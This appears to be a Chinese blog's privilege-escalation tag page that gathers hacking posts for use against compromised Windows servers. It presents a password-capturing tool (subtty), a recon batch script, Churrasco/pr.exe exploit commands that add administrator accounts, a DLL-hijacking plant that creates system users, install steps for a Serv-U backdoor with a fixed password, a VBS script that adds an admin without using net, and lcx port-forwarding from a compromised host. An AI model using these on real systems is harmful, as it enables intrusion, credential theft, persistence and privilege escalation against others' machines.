Ψ小川Ψ dě Blog

标签:提权

Subtty记录Linux密码的利器

一直在寻找一款能够记录SSH密码的工具,subtty这款工具能够记录su,sudo,SSH,gpg, cryptmount等,非常强大,只要是一个交互的终端即可。
该工具作者是Julien Tinnes,感谢这位大神,这里也分享给大家。
在作者博客下载的只有编译好的二进制程序(回头找他要源码),这里简单说一下使用方法,这个程序不需要root权限,但是很快就有root了。
可以有四种方式调用程序来记录密码:

提权渗透技巧总结 (下)

收集系统信息的脚本:
for window:
@echo off
echo #########system info collection
systeminfo
ver
hostname
net user
net localgroup
net localgroup administrators
net user guest
net user administrator
echo #######at- with   atq#####
echo schtask /query
echo
echo ####task-list#############
tasklist /svc
echo
echo ####net-work infomation
ipconfig/all
route print
arp -a
netstat -anipconfig /displaydns
echo
echo #######service############
sc query type= service state= all
echo #######file-##############
cd \
tree -F

提权渗透技巧总结 (上)

旁站路径问题:
1、读网站配置。
2、用以下VBS:

On Error Resume Next
If (LCase(Right(WScript.Fullname, 11)) = “wscript.exe”) Then
MsgBox Space(12) & “IIS Virtual Web Viewer” & Space(12) & Chr(13) & Space(9) & ” Usage:Cscript vWeb.vbs”, 4096, “Lilo”
WScript.Quit
End If
Set objservice = GetObject(“IIS://LocalHost/W3SVC”)
For Each obj3w In objservice
If IsNumeric(obj3w.Name) Then
Set OService = GetObject(“IIS://LocalHost/W3SVC/” & obj3w.Name)
Set VDirObj = OService.GetObject(“IIsWebVirtualDir”, “ROOT”)
If Err <> 0 Then WScript.Quit (1)
WScript.Echo Chr(10) & “[” & OService.ServerComment & “]”
For Each Binds In OService.ServerBindings
Web = “{ ” & Replace(Binds, “:”, ” } { “) & ” }”
WScript.Echo Replace(Split(Replace(Web, ” “, “”), “}{“)(2), “}”, “”)
Next
WScript.Echo “Path            : ” & VDirObj.Path
End If
Next

FileZilla 提权

拿到一个webshell,想提权,服务器权限设置的不严,但是提权不好提,只有一个C盘,也没装什么软件,没mysql,mssql,su,360等一些熟悉的提权软件。执行下命令看看吧!netstat -an看到有个默认的端口14147网上搜了下原来是一款叫做FileZilla的FTP软件的一个管理端口。

在webshell查看FileZilla的配置文件得到管理用户名和密码

本地监听 lcx -listen 7788 9900,

在虚拟机里进行转发如下图1-2

dff336faa9d5ebc49f51463d

 

Churrasco.exe、pr.exe、ms10048提权

1.Churrasco.exe,是win2003 系统下的一个本地提权0day,通过此工具执行命令即可添加管理用户。

 

使用方法:

Churrasco.exe “net user admin1 admin1 /add && net localgroup administrators admin1 /add”

2.pr.exe 提权Windows跟踪注册表项的ACL权限提升漏洞
Windows管理规范(WMI)提供程序没有正确地隔离NetworkService或LocalService帐号下运行的进程,同一帐号下运行的两个独立进程可以完全访问对方的文件句柄、注册表项等资源。WMI提供程序主机进程在某些情况下会持有SYSTEM令牌,如果攻击者可以以 NetworkService或LocalService帐号访问计算机,攻击者就可以执行代码探索SYSTEM令牌的WMI提供程序主机进程。一旦找到了SYSTEM令牌,就可以获得SYSTEM级的权限提升。

使用方法:

pr.exe “gets.exe $local”

pr.exe “net user admin1 admin1 /add & net localgroup administrators admin /add”

bb8ac980957c789a9023d9e2

6ecc0fd76367e390a044dfe2

Ws2Help.dll提权

上传到sougou目录,注意不要改名字。等待该目录有文件联网的时候就自动添加系统账号了。

使用方法:把此文件放到QQ 迅雷 BT 等工具的同目录下。运行后会导致系统执行创建用户
需要创建的用户名和密码可以十六进制修改。

Ps:

一个程序的启动它会调用很多dll或者ocx组件,但是他是有一个顺序的。

比如这个迅雷,他启动时会调用Ws2Help.dll这个组件,
一般的情况,这个组件是我们的windows默认就有的
但是程序调用组件有这样一个顺序,他会首先在程序所在的文件夹寻找,如果没有他就再去系统目录寻找这个组件。

这个就是利用这个顺序差的原因来利用的。在迅雷启动时他就会启动这个目录的组件,而不去系统查找了。
去年流行的“犇牛”也是这样的,他是利用的usp10.dll。

而这里利用的是Ws2Help.dll

下载:

Serv-U BlackDoor

安装方法:
将DLL放到Serv-U 安装目录下.
打开安装目录下的: ServUDaemon.ini 文件,在最后部分加入3行:
[EXTERNAL]
ClientCheckDLL1=Serv-U.dll
EventHookDLL1=Serv-U.dll
===================================
重启 Serv-U 服务.
===================================
连接方法:
命令行 连接FTP,用户名随意.密码1234567

===================================

 

备注:修复一个错误,要执行的命令行太长可能会导致SERV-U出错。

同时兼容了FTP客户端软件可以连接,浏览、删除、上传 任意目录的文件。

3e0ee5cda7369a160eb3459e

无net提权的脚本

真正的无net加系统用户能用的脚本。当我们遇到提权的时候,nc反弹提权的时候,管理员把net1和net给禁用了,我们可以上传一个脚本,做到真正的无net加系统用户。脚本代码如下:

struser=wscript.arguments(0)
strpass=wscript.arguments(1)

set lp=createObject(“WSCRIPT.NETWORK”)
oz=”WinNT://”&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&”/Administrators,group”)
Set od=ob.create(“user”,struser)
od.SetPassword strpass
od.SetInfo
Set of=GetObject(oz&”/” & struser & “,user”)
oe.Add(of.ADsPath)

For Each admin in oe.Members
if struser=admin.Name then
Wscript.echo struser & ” 建立成功!”
wscript.quit
end if
Next

Wscript.echo struser & ” 用户建立失败!”

 

保存以上代码为 user.vbs 用法:cscript user.vbs 用户 密码

 

【转】mylcx 穿墙版

作者:gaohui

mylcx -listen 这个命令跟lcx一样
mylcx -slave 本机端口 远程ip 远程端口
即把本机端口映射到远程ip的一个端口上

在本机执行:mylcx -listen 5000 21
在肉鸡上执行:mylcx -slave 21 你的ip 5000
然后连接ftp 127.0.0.1 就可以登录远程的ftp了